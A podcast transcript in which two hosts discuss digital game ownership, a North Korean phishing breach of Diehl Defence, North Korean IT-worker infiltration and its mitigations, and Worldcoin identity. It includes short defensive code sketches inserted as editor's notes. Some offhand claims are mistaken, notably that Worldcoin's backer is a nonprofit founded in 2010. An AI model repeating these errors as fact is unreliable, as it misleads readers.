Yeah, it'd be a little bit, well, I bought this game, I paid like $60 for it and digitally downloaded it, and now it's just gone from my library. Right. Well, if 'buy' or 'purchase' is not the word used, maybe it's at least a little more obvious, and, you know, maybe you still pay for it, but, you know, at least going into it, it's a little more obvious, you know, that you don't own it, man. [01:01:49] Speaker B: You know, I feel like maybe we're at the. So because I'm into retro gaming a lot, there's a lot of people out there that develop games for retro systems, like modern, current games, where they're like, hey, I like the eight-bit Nintendo. I think it was awesome. I want to make my own eight-bit game, and that will play on a Nintendo emulator, and Nintendo can go pound sand because they don't own this, they don't have the rights. So. And there's a lot of pretty cool games out there that are being developed now for all these systems: the NES, SNES, Genesis, you name it, all these Game Boys, Game Boy Advance, Dreamcast, you name it, people are making games for these things. It seems like we are now at a really good spot where, cool, Sony doesn't want us to own, Nintendo doesn't want us to own, Microsoft doesn't want us to own. Let's just become independent game developers and kind of decentralize those games. The developer directly makes the money from their labors, because I purchased it from you, you made it, here's your money. I get the game. Everybody's happy, right? They don't have to go through, like, I get the appeal of going through a big company, because they have, you know, a basically infinite amount of money to help you develop an awesome game. But again, it's all about, is it worth it? Right. We've said that a couple of times this episode already. Is it worth it? And we've kind of pushed it so far that now, because you have no ownership, to me, it wouldn't be worth it anymore. I don't care.
And I abandoned consoles in like 2012 or '14 because of it. Yeah, I was like, I'm sick of not owning my stuff. Yeah, they got cool games, but I lived this long without them. I think I can go longer without it. You know, I just act like they don't exist. [01:03:43] Speaker A: And I think you're right. It's the balance of whether it's worth it or not. [01:03:46] Speaker B: Right. [01:03:46] Speaker A: And as far as physical media goes, there's a lot of convenience. A lot of it comes down to convenience. Yeah, as far as, okay, if I want to take my Switch to Deadwood with us. Right. And I probably will, so I can play it on the plane or whatever. I don't have to worry about bringing ten game cartridges so I can play that number of games. If I just download them digitally, well, I got ten games in my library that I can play at any time. Right. But the downside of that is that I don't have a physical copy that I own that I can then play. For all I know, maybe it's not likely, but for all I know, Nintendo could say, sorry. Nope, nope, nope, nope. We're yanking this stuff. And you don't. You don't have it in your library anymore. So, yes, it's convenient to be able to have access to it. But is it worth it? Right? Maybe. [01:04:22] Speaker B: Well, and that. That goes to the idea that you have it all stored in the cloud. And even if it is, like, what you're doing is you're relying on Nintendo's cloud platform to access your games. Guess what? I don't. I can access my games in a cloud platform. That doesn't have to be Nintendo. [01:04:40] Speaker A: Yeah, right. [01:04:41] Speaker B: There is a digital file out there. That is the game. As long as I have a copy of that, I put it on, and my retro handheld has Wi-Fi built into it, I can hotspot my phone. And now if I have it up in Dropbox or wherever, stream it down. And then there's, like, Moonlight for streaming your games to your handhelds. [01:05:00] Speaker A: Oh, that's neat. [01:05:01] Speaker B: Yeah.
So if you have the game on your Xbox or whatever, in Steam, you use Moonlight. Go. It's actually playing on my PC, on my thing, but it's. It's streaming the content to my handheld. So we live in a technological time. I could download the game onto my handheld. It has internal storage, and now the game resides on my. On my actual system. So go ahead and cut off my cloud access to Nintendo. [01:05:26] Speaker A: I dare you. Yeah. [01:05:28] Speaker B: Threaten me with a good time. [01:05:30] Speaker A: To be clear, I'm not saying that I don't digitally download. Like, I do have digitally downloaded games. I'm not saying, like, I have all physical media. A lot of my games are digital because it's just the old Switch I had. The port. I got it. My brother gave it to me because the port for the games didn't work. So I had to get my stuff digital. But. So I'm not saying I don't use it. I'm just saying, when you weigh the pros and cons. You know what it. [01:05:50] Speaker B: Is? If you think about it, companies like Nintendo, Sony, or any. Any company that gets you kind of hooked into their ecosphere. How do they do that? Right? They make it easy. They make it so easy. And they give you, like, the best of everything. But you don't realize you're making this, like, this deal with the devil, right. I always think of it as, like, did you ever see the movie Bedazzled? [01:06:17] Speaker A: No, what? [01:06:18] Speaker B: Super funny. There's the original version of Bedazzled, and there's the Brendan Fraser remake that was done in, I think, the late nineties or early two thousands. 2000. Very funny. And it goes to the idea of making a deal with the devil. Basically, this guy gets to make a deal with the devil for ten wishes, or however many wishes it was, but everything he wishes for, the devil twists it and makes it horrible. Right.
So if he wishes for world peace, it's because everybody's dead, you know, and therefore no one's around to war, or that kind of thing. Right. And that's how I feel signing these licensing contracts with people. When you buy into their ecosystem, that's what's happening. You feel like you're getting this cool thing of, I've got these great games. I've got access to all the great creature comforts that they build for the system. But underneath the surface there's, like, all this stuff going on that I'm just not aware of. And it's not good for me. It doesn't benefit me in any good way. Right. Yeah, it's just a way for them. And you can say, well, you're making a contract. Real good. I agree with that. You're absolutely making a contractual agreement with these companies. I just don't think that, like, most times, most of the time when you enter into a contract between two parties, there's mutual benefit. That's why we're entering into a contract with each other. And it should be pretty equal in benefits. You should benefit in such a way. And I get to agree. And yes, I read your EULAs, but that's a lot. You know what I mean? It's unreasonable to say that the average person is going to hire a lawyer to be able to look through all the lawyer speak that's in a EULA to discern what's actually going on under the hood. That's not fair. So therefore, decentralize. Spend a little bit more time inconveniencing yourself in little ways for your own benefit. Right. It's the long game. It's the long run. Look big picture. Don't look at what's expedient right now. Look at how it affects you down the road. [01:08:27] Speaker A: Yeah, I got a little entranced in reading this Wikipedia page for the film Bedazzled. Wild. [01:08:34] Speaker B: It's very funny, very odd. Yeah. [01:08:37] Speaker A: But now I kind of want to watch it. [01:08:38] Speaker B: Oh, yeah. Super worth a watch. [01:08:39] Speaker A: Maybe I'll go download some digital media.
[01:08:40] Speaker B: Off Amazon Prime and watch it. Elizabeth Hurley was the devil. That's the one I. Oh, okay. [01:08:46] Speaker A: Okay. The original, the 1967 one. It was like a dude named George Spiggott or something was the character name. I don't know. Maybe I'll go watch it then. So. But I know we're coming up on our time here. This episode may go a little long, but I think that's okay, because there was a lot of. [01:08:58] Speaker B: We do what we want. [01:08:59] Speaker A: Yeah. A lot of good news this week. Jumping across oceans or. Yeah, across oceans. To Europe. North Korea hackers linked to breach of German missile manufacturer. So Europe and Asia, I guess. We have talked previously about concerns with North Korean foreign nationals being able to infiltrate companies through deepfakes and things like that. So what exactly happened here? [01:09:22] Speaker B: So, Kimsuky. Old Kimsuky, the old North Korean APT we see out there doing their darnedest, working hard. That's right. They're working hard. So they did a lot of work to infiltrate a German weapons manufacturer that makes missiles and ammunition. And it seems like this is kind of like a revenge hack, because recently this company, which is called Diehl Defence. I think it's pronounced deal. Diehl. Right? [01:09:54] Speaker A: Diehl. Yeah, that looks right. [01:09:55] Speaker B: Diehl Defence. They recently penned a contract with South Korea to send them. They purchased missiles from them. [01:10:03] Speaker A: Oh, okay. [01:10:04] Speaker B: FYI, North and South Korea, not like siblings. They're not simpatico, not on speaking terms at the moment. Yeah. [01:10:12] Speaker A: Okay. [01:10:13] Speaker B: So it seems reasonable that this might be them kind of doing some retribution acts. [01:10:18] Speaker A: Okay. [01:10:18] Speaker B: Against their. [01:10:19] Speaker A: Interesting. [01:10:20] Speaker B: Their people. But very, very interesting. They made some PDFs that had some naughty, basic malware stuff in them.
[01:10:33] Speaker A: Hmm. [01:10:34] Speaker B: Doing that. And they. So it says right here, making air-to-air missiles. Oh, here we go. Diehl Defence, according to the Der Spiegel report. That's always fun to say. I want to say Der Spiegel more often. [01:10:48] Speaker A: Yeah. [01:10:49] Speaker B: Researchers at Mandiant investigated the compromise and found the attackers performed detailed reconnaissance on Diehl Defence ahead of the spear phishing attacks. Der Spiegel reported that Kimsuky hackers hid the attack servers behind addresses containing Überlingen, a reference to Diehl Defence's location in Überlingen, southern Germany. The attackers also hosted authentic-looking German-language login pages that resembled those of telecommunications provider Telekom and email service GMX, suggesting that the attackers were bulk harvesting login credentials of German users. Mandiant could not be reached for comment. So this was. This was just crazy, that they went to these lengths to target the. So a professional hacking team linked to North Korea had broken into Diehl Defence. Bada bing. So. And they used fake job offers and advanced social engineering attacks. That was kind of like the big deal on this, was that they were reaching out to the employees of Diehl Defence saying, hey, we're a US contractor, we work in the same space. We see the work you're doing. It's amazing. We'd love to bring you on. Download this PDF, fill out the form, so on and so forth. So again, we keep seeing North Korea using this tactic of jobs and employment as a ruse, as a pretext for gaining access into these systems, either through direct employment or by targeting the employees of a target. [01:12:34] Speaker A: And we saw this with KnowBe4 several weeks ago. [01:12:37] Speaker B: Yeah. [01:12:37] Speaker A: And they of course caught the guy, which. Good job. Yeah, good job.
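[Editor's note] That detail about attacker infrastructure hiding behind addresses containing "Überlingen" suggests a simple defensive check defenders can run: scan observed domains for brand- or location-lookalike substrings. This is a minimal sketch, not anything from the Mandiant or Der Spiegel reporting; the watchlist terms come from brands mentioned in the story, while the sample domains and allowlist are hypothetical illustrations.

```python
# Flag domains that embed brand/location keywords but aren't on an allowlist.
# Watchlist terms come from the story (Überlingen, Diehl, Telekom, GMX);
# the sample domains and allowlist entries are hypothetical examples.

WATCHLIST = ["uberlingen", "diehl", "telekom", "gmx"]
ALLOWLIST = {"telekom.de", "gmx.net", "diehl.com"}  # known-good domains

def suspicious(domain: str) -> bool:
    """True if a domain embeds a watchlist term but isn't a known-good site."""
    d = domain.lower()
    if d in ALLOWLIST:
        return False
    return any(term in d for term in WATCHLIST)

observed = ["login-telekom-kunden.example", "gmx.net", "uberlingen-portal.example"]
flagged = [d for d in observed if suspicious(d)]
print(flagged)  # flags the two lookalikes, not the real gmx.net
```

In practice a check like this would feed from proxy or DNS logs, and substring matching is only a first pass; it is cheap enough, though, to catch the kind of location-themed lookalikes described here.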
But KnowBe4 is not the only company that has experienced this or talked about this. And in fact, segueing into our next piece, Google is warning folks about this. "Google warns of North Korean IT workers have infiltrated the US workforce." That's an interesting title. They're warning us. They're saying, hey, this is a problem. Just like Daniel just said, they're here, guys. [01:13:04] Speaker B: Good job. Yeah, good job. [01:13:06] Speaker A: I know that because of my mom. [01:13:08] Speaker B: It's Halloween now. So you got. It is. [01:13:09] Speaker A: And I got my jack-o'-lantern. [01:13:10] Speaker B: You do? Good job. [01:13:11] Speaker A: I am all set. So, yes. Anyway, Google's saying, hey, watch out for this. This is a real issue, a real threat. And like you said, it's basically disguising themselves as non-North Koreans, for lack of a better way to put it, infiltrating industries to generate revenue and potentially, I don't know, in the extreme sense, conduct espionage. In theory. In theory. Could be an outcome. Right? [01:13:36] Speaker B: Could be an outcome. That's exactly right. Listen, they don't care what you got, they want it. That's basically what it is. Now, they are typically targeting tech firms. [01:13:46] Speaker A: Sure. [01:13:46] Speaker B: Specifically. And why? Because they have the acumen to be able to act as an employee for one of those companies. What I really enjoyed about this article was that it goes into kind of showing you what that looks like. Right. That here is a resume that might be generated to be useful for these folks to kind of get in. It's like. So here we have on my screen: Learn more about me. Senior software engineer. Right? This is basically a part of this dude's resume, right? And then once they engage into getting into talking. So here we go. Senior software engineer. This is what this looks like. Now.
I thought this would be interesting for the folks that are watching. I know a lot of people, because I spend a lot of time on LinkedIn, are, like, struggling to find IT work because of the massive layoffs that have happened here recently. So the market's kind of flooded. Well, just. Just copy what these folks are doing, because apparently it's working. Use them as kind of a template. Well, if I wanted to get a resume that's going to work, let me see what these North Koreans are doing, because they're obviously spending a lot of time learning what goes into a good resume to make them on the short list of possible hires so they can infiltrate these tech companies. Right. We hack right back. Cool. Show me the research. Show me what that looks like, for, you know, research purposes. That's all. And then make your resume like theirs, except real, you know. Except that you're a real person that can do this and is not malicious, because they're obviously getting work. [01:15:27] Speaker A: You were talking a little bit before. We were kind of chatting about this before the show, about how maybe a good way, or at least a good place to start as far as preventing against this kind of stuff is. Yes, we understand remote work is a reality now. Lots of people work remotely. Lots of companies employ these kinds of positions. Understandable, right? That's the world we live in now. But to prevent against what happened at KnowBe4, where it was a deepfake image, a deepfake employee, or a deepfake voice or something that this person used basically to get away with this. To prevent against things like that, have your initial round of, hey, we're accepting resumes. Maybe you conduct your initial interview over the phone or something like that. But once you get to the final four or five people, however many you narrow it down to for that position, fly them out and say, hey, we're doing all of our final interviews in person.
And you're kind of talking about, like, the expense of that would be worth it to prevent against something like this from happening. [01:16:21] Speaker B: Yeah, it's kind of, kind of. Well, I understand why we haven't done that in history past. [01:16:26] Speaker A: Sure. [01:16:27] Speaker B: Now we're in a brave new world, right, where this is starting to become a thing. So it's worth it, probably for a lot of companies to think of it as insurance. You're just paying your insurance bill to go, you know what? Come on out. Let's fly you in, get you a nice dinner, and even if you don't make it to the last round, we appreciate your time and your effort, and you didn't walk away with nothing. You got a nice little trip to our headquarters. We took you out for a dinner, and you got to meet some cool people. And if you were cool in the interview, even though you didn't make it, please feel free to use this as a reference and that kind of thing, you start to build relationships with people. So there's a good benefit to doing this. The last round of interviewing in person, not forgetting the idea that some north korean hacker might be trying to access into your systems. So it's a win win for everybody to do it that way. And cheap insurance on the back end. [01:17:21] Speaker A: Well, now that you say that, you remember Madeline, who used to work here, used to have somebody who worked on our production team. Madeline. She's since moved, but she was looking at jobs, remote jobs, out of state, and applied for one, and she's got an interview with them, or she talked to them over the phone, did a preliminary thing. Her final interview is in person. They said, hey, come on out. You can either we'll help you fly up, or you can drive. And she's gonna, like, make a weekend out of it. And, yeah, I'll go see the city and whatever and go to this. So I doubt in that case it's to prevent against north korean hackers, but I think you're right. And I heard about that. 
I'm like, that's so cool that they're like, yeah, come out for an in-person interview. And then, hey, if you decide you want to move out here, you've already seen the location. But at the same time, even for remote work, we've met you. We now have an idea, even personality-wise, of whether you are a good fit for this position or for this organization. I think there's a lot of benefits that could come with doing something like that. [01:18:07] Speaker B: Absolutely. And other mitigations in this article. And this is why I really wanted to put this article in, because it shows you a lot that they've recommended. So they say: it has been recommended that organizations implement stringent vetting processes to detect DPRK IT workers. These processes include requiring biometric information for background checks, conducting thorough interviews on camera. So none of this 'my camera doesn't work' stuff. If your camera don't work, then we'll reschedule. Right? Verifying identity through notarized proof. Organizations should also train HR departments to identify inconsistencies in candidate profiles and monitor for AI-modified profile pictures, which can help organizations mitigate the threat posed by North Korean cyber actors. To mitigate more, they must verify phone numbers for VoIP usage, confirm laptop geolocation matches reported residency, restrict remote administration tools, monitor VPN connections, and detect mouse-jiggling software. Additionally, verifying laptop serial numbers, implementing hardware-based multi-factor authentication, and restricting IP-based KVMs can strengthen security. And of course, to mitigate remote employee risks, implement periodic video checks, provide ongoing security education, collaborate with threat intelligence communities, and restrict financial transactions to US banks. So lots of mitigation to be done on this. Obviously, we're kind of on the edge of this happening. This is just now becoming a real problem.
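[Editor's note] Several of the checks in that list (VoIP phone numbers, laptop geolocation versus reported residency, the "camera doesn't work" excuse, remote admin tooling) lend themselves to a simple automated red-flag score during onboarding. The sketch below is a hypothetical illustration, not any vendor's actual tooling; the `Candidate` fields stand in for data you would pull from number-type lookups, shipping records, and interview notes.

```python
from dataclasses import dataclass

# Hypothetical candidate record; each field mirrors a check from the article.
@dataclass
class Candidate:
    phone_is_voip: bool            # from a phone number-type lookup
    laptop_country: str            # from shipping/geolocation records
    reported_country: str          # from the candidate's application
    camera_worked_in_interview: bool
    uses_remote_admin_tools: bool  # from endpoint monitoring

def red_flags(c: Candidate) -> list[str]:
    """Collect human-readable red flags for a reviewer to triage."""
    flags = []
    if c.phone_is_voip:
        flags.append("VoIP phone number")
    if c.laptop_country != c.reported_country:
        flags.append("laptop geolocation mismatch")
    if not c.camera_worked_in_interview:
        flags.append("camera 'didn't work' on video interview")
    if c.uses_remote_admin_tools:
        flags.append("remote administration tooling detected")
    return flags

suspect = Candidate(True, "KP", "US", False, False)
print(red_flags(suspect))
```

None of these signals is damning alone (plenty of legitimate hires use VoIP numbers), which is why a scorer that surfaces flags for human review fits better than an automatic reject.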
[01:19:37] Speaker A: Brave new world. [01:19:38] Speaker B: So you got a lot of work to do. [01:19:39] Speaker A: This is just kind of an aside, but I was doing a little bit of googling. You know, we talked about Kia earlier and the security issue. You know, Kia is a Korean car brand. [01:19:46] Speaker B: Oh, yes, I did know that. [01:19:47] Speaker A: And they were founded the year before North and South Korea split. [01:19:50] Speaker B: Did they really? [01:19:50] Speaker A: Yeah, 1944. And the split started in '45. [01:19:53] Speaker B: How about that? [01:19:53] Speaker A: So, tinfoil hat time: the Kia hack, it was due to North Korean infiltrators. They're back. So anyway, fun fact, I did not know that Kia was a Korean brand. Now I know. I don't drive a Kia, so it doesn't matter. But I know we're pushing on time. We won't spend too much time on this last one, partially because I just wanted to throw it in. [01:20:14] Speaker B: Kind of an interesting thing. [01:20:15] Speaker A: It's a little interesting idea. So if you haven't heard, there's this thing called Worldcoin. The way this article frames it is fighting deepfakes and bots with global permissionless blockchain identity. And essentially, to probably oversimplify it, it sounds like this is basically, if it plays out, going to work like almost a virtual ID card or a virtual passport. And the goal eventually is to have everybody using this blockchain identity system to prove, basically, that you are a real person in the midst of, you know, the dead Internet theory, about how there is so much AI-generated content. [01:20:47] Speaker B: At least 40% of Internet traffic is, like, bots. [01:20:51] Speaker A: So to prevent against that kind of stuff, and to prevent against, you know, people pretending to be somebody they're not and pushing, you know, malicious stuff or whatever.
You gotta provide this, you know, proof that you are a real person surfing the Internet, which is kind of the opposite, I think, of what the Internet started out as, which is most everybody was pretty anonymous. [01:21:07] Speaker B: Yeah. [01:21:08] Speaker A: And of course there's, hey, this is great because it can prevent against this bad stuff happening. But to me, this makes me a little nervous. Not cause I'm trying to do bad stuff, but just because I don't like the idea that I've got to then basically retain, in theory, in the future, I've got to retain an online id card. [01:21:23] Speaker B: Just the mark of the beast. [01:21:24] Speaker A: Just you say that. [01:21:27] Speaker B: Oh, tinfoil hat me. Come on now. [01:21:29] Speaker A: Say that one of my family members is going to watch this and be like, well, hey, it actually is. You know, it's. It's a theory. So I just don't love the idea that in order to do anything online, in theory, maybe in the future. Let me see some id. Come on. I'm trying to buy stuff, papers, whatever. [01:21:46] Speaker B: Velvet. [01:21:47] Speaker A: So I don't love this idea. We'd love to know what y'all think about it. I'm curious. We have limited information on this, but what's your opinion on that idea? [01:21:54] Speaker B: You know, I'm just getting more and more paranoid in my old age, I guess. And I don't trust the government, so there's that. [01:22:04] Speaker A: Valid. [01:22:04] Speaker B: I just don't. They have yet to prove trustworthy. [01:22:07] Speaker A: Haven't given us a lot to trust, have they? [01:22:09] Speaker B: Really kick you every time you go, you know what I think? Oh, yeah, they got me again. That hurt. That was a good one. You got me right this side of the head. So if that's gonna be the entity, it would have to be some. 
And even then, I don't know, you'd have to show me some real robust protections, because we have other things, correct me if I'm wrong, that are on the blockchain, and they have been kind of compromised. [01:22:38] Speaker A: It's. It's not impossible. [01:22:40] Speaker B: Right? So what makes this gonna be any different? [01:22:43] Speaker A: Yeah, that's a good point. This comes from. It's the Worldcoin slash TFH identity solution, is how they're branding this. TFH is the company. It is a nonprofit organization founded by OpenAI's Sam Altman, and it was founded back in 2010. Okay, so this organization's been around for a little hot minute. You know, it's a long article. It is. So I'll put it in the description so y'all can look at it in more detail. A lot of it is. I don't want to trash talk the author of this article, but a lot of it does seem to be, like, biased in favor, I guess. [01:23:19] Speaker B: An op-ed. [01:23:20] Speaker A: Yeah, biased in favor of this kind of a tool, which, I guess you're gonna have bias either way. It could be biased the other direction, like, this is the devil, you know? So you're never gonna fully be able to win with stuff like that. But I do think it's interesting. It's founded by the same guy that founded OpenAI. Yeah. Kind of a fun coincidence. And the purpose of it is to prove humanity, basically prove that you are a human on the Internet and not a bot. So, in theory, best. You know, it's good intentions, right? Best plans. But I don't know. It just. [01:23:48] Speaker B: Think the Internet will ever get to the point where it's just bots talking to bots? [01:23:53] Speaker A: I was thinking, because, I mean, I guess to get away from this. I don't know, would you go to the dark web and start just doing all your stuff there? I would wonder, if something like this became implemented widespread, and people like us that are like, we don't love that idea, maybe we don't want to use it.
Or people like, even my parents, that are like, hey, I don't like the idea of you forcing me to do anything. Right? Like, totally get that. You get to a point where you're forced to do enough stuff, and you're like, quit making me do stuff. Leave me alone. [01:24:16] Speaker B: I really don't like being, yeah, forced. [01:24:18] Speaker A: Leave me alone. Give me the information. Let me make the decision, but quit forcing stuff on me. Yeah, same with the ads. Quit forcing stuff. [01:24:24] Speaker B: Give me the option. [01:24:24] Speaker A: Give me the option. [01:24:25] Speaker B: Yeah. [01:24:25] Speaker A: So, and I could see this is getting way into theoretical territory, but I wonder if you would see people then start to move to the dark web. [01:24:34] Speaker B: So, if I've got some sort of, like, digital identity assigned to me and everything I do on the Internet, would this be a part of the ledger on the blockchain? [01:24:47] Speaker A: I don't know. [01:24:48] Speaker B: Right. Would that be being tracked in the ledger? Every site I go to, everything I do, everything I click. You start to see the problem there. Yeah, I don't like that. [01:24:58] Speaker A: And it's confirmed to belong to a living human by a double iris scan. So then they've got your, you know, biometric information. Because, I guess, how else do you prove you're human? [01:25:06] Speaker B: So, honestly, though, like, question: what do I care that there's bots on the Internet? How does that affect me? [01:25:14] Speaker A: Yeah. [01:25:15] Speaker B: Right. [01:25:15] Speaker A: Yeah. [01:25:16] Speaker B: Me personally? It probably doesn't so much, because I have very limited social media. [01:25:19] Speaker A: Sure. [01:25:20] Speaker B: Right.
Cause it's all bots. [01:25:26] Speaker A: We'll revert back to how we were. [01:25:28] Speaker B: Realize the well is poisoned, and you just stop drinking out of it. [01:25:32] Speaker A: So, yeah, I don't love the idea of this World ID, World Chain stuff. And I remember reading about it months ago, and it was like, very, oh, hey, what a dream world. And it could very quickly become reality. So I don't love it. Would love to hear what y'all think about that. I won't dwell on it any longer because I know we're running long, but. [01:25:50] Speaker B: I see this being useful for something like news outlets, to prove that this isn't, like, an AI generated news story, that a human actually did it. Like, if you're a journalist, it's like your press pass to the Internet. [01:26:04] Speaker A: Sure. [01:26:04] Speaker B: Right. And then everything you do, just with that. Not as a person, but just as a journalist or something like that. That way we can verify the facts and the story are true, that you did write it, and that we can confirm all these things. That's where it seems to, like, be useful. [01:26:22] Speaker A: Sure. In very specific use cases. Yeah. Specific careers or whatever. [01:26:26] Speaker B: If I was in politics or something to that effect, or a public figure, everything can be kind of tied to that. But as rando users on the Internet, what's the point? What do you need that for? [01:26:35] Speaker A: Yeah. Other than that, if we don't do something like that regarding news content, we'll just revert back to getting the newspaper every day. [01:26:40] Speaker B: Right. [01:26:40] Speaker A: No more digital news. [01:26:41] Speaker B: How is that gonna stop something like the YouTube algorithm from promoting stuff that it wants to promote? [01:26:48] Speaker A: Yeah. [01:26:48] Speaker B: Right. [01:26:50] Speaker A: It's a good point. It's. [01:26:51] Speaker B: Maybe there is.
I don't know. [01:26:53] Speaker A: It's a solution to a problem, but is it necessary? [01:26:56] Speaker B: We're a hammer looking for a nail. [01:26:57] Speaker A: Yeah. Is it necessary? I don't know. [01:27:00] Speaker B: Maybe in some ways, maybe in some ways not. [01:27:02] Speaker A: But, hey, maybe somebody will comment and be like, hey, I think you're totally wrong. So please, you know, enlighten us. Let us know. [01:27:08] Speaker B: Here's the thing. We're just people reading stories on the Internet. [01:27:13] Speaker A: We are people. [01:27:14] Speaker B: I do not know the entirety of the world history on every subject that we talk about. Some of this stuff, I just read an article and was like, that seems interesting. [01:27:22] Speaker A: Yeah. We are not AI generated, though. We are real people, and that's how. [01:27:25] Speaker B: You know we're real. [01:27:26] Speaker A: We'll add our World Chain ID to this Technado. [01:27:29] Speaker B: Yeah. Would we qualify as journalists at this point if we're just reading the news from other people that may have. [01:27:33] Speaker A: I don't know if I want to. [01:27:34] Speaker B: I don't either. [01:27:35] Speaker A: I don't think I want that title. [01:27:37] Speaker B: I'll shut the Technado down tomorrow if that's what's up. [01:27:42] Speaker A: Well, we'll call it there before I get in trouble. No, this was a little bit of a longer one, but hopefully you enjoyed the news pieces this week. We will see you next week in Deadwood. But until then, we hope you enjoyed this episode. We'll see you next time. Thanks for watching. If you enjoyed today's show, consider subscribing so you'll never miss a new episode.
